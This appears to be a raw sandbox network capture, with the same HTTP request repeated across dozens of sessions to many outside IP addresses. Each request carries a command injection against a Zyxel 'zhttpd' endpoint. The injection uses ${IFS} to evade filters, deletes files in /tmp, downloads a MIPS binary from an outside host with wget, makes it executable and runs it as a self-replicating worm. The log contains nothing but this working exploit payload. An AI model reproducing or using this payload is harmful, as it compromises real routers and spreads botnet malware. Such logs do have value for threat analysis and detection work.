                                                Jan 28, 2024 10:16:18.705053091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2779192.168.2.2352484194.76.244.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705070972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2780192.168.2.233625273.219.12.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705095053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2781192.168.2.2349100146.77.202.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705132961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2782192.168.2.235702864.150.247.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705149889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2783192.168.2.2358564213.131.21.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705188990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2784192.168.2.234919858.31.248.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705213070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2785192.168.2.2340416137.130.50.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705218077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2786192.168.2.235088080.216.241.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705281019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2787192.168.2.2352860186.221.166.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705281019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2788192.168.2.2352696204.191.47.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705322981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2789192.168.2.2338654174.62.186.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705338001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2790192.168.2.2357644219.0.114.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705358028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2791192.168.2.235410851.240.98.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705383062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2792192.168.2.2347664198.55.138.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705411911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2793192.168.2.234815062.228.251.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705446959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2794192.168.2.234634453.104.68.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705473900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2795192.168.2.2338088152.224.159.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705492020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2796192.168.2.2351476156.49.80.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705523014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2797192.168.2.2350752207.102.143.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705574036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2798192.168.2.235619475.235.112.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705622911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2799192.168.2.2350598152.249.23.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705652952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2800192.168.2.2337114191.80.187.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705661058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2801192.168.2.2345660210.233.73.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705667019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2802192.168.2.233644412.190.202.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705717087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2803192.168.2.235419673.77.254.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705744028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2804192.168.2.2347430145.72.24.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705770016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2805192.168.2.234994693.1.98.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705806971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2806192.168.2.2349572140.255.63.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705823898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2807192.168.2.235668090.253.90.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705852985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2808192.168.2.2356836209.0.141.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705883980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2809192.168.2.234942051.132.5.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705914974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2810192.168.2.2336062156.124.110.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705924988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2811192.168.2.2345788148.0.209.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705940962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2812192.168.2.2346212209.173.171.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705971956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2813192.168.2.2353810133.221.126.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706010103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2814192.168.2.235107049.124.101.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706033945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2815192.168.2.2349614107.77.139.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706073999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2816192.168.2.2335416177.160.12.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706094027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2817192.168.2.2355890130.214.171.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706115007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2818192.168.2.233652414.96.88.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706170082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2819192.168.2.235609699.95.82.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706197977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2820192.168.2.2356460144.200.166.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706228018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2821192.168.2.234748082.100.44.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706248045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2822192.168.2.235912231.50.194.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706275940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2823192.168.2.2348154131.230.107.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706305981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2824192.168.2.23571842.58.65.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706309080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2825192.168.2.235933854.245.207.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706343889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2826192.168.2.2350130174.88.89.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706372976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2827192.168.2.2349422197.113.143.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706406116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2828192.168.2.236063067.96.145.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706454039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2829192.168.2.2345610117.75.22.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706471920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2830192.168.2.234024292.3.71.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706506014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2831192.168.2.2358094129.176.197.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706530094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2832192.168.2.2332954178.242.85.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706581116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2833192.168.2.2344164115.20.180.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706588030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2834192.168.2.2339374129.170.254.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706620932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2835192.168.2.234377688.6.102.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706638098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2836192.168.2.235554471.137.148.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706676960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2837192.168.2.234640883.46.177.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706727028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2838192.168.2.2348164165.98.253.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706753016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2839192.168.2.2341724199.80.84.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706805944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2840192.168.2.235693631.112.40.38443
                                                TimestampBytes transferredDirectionData
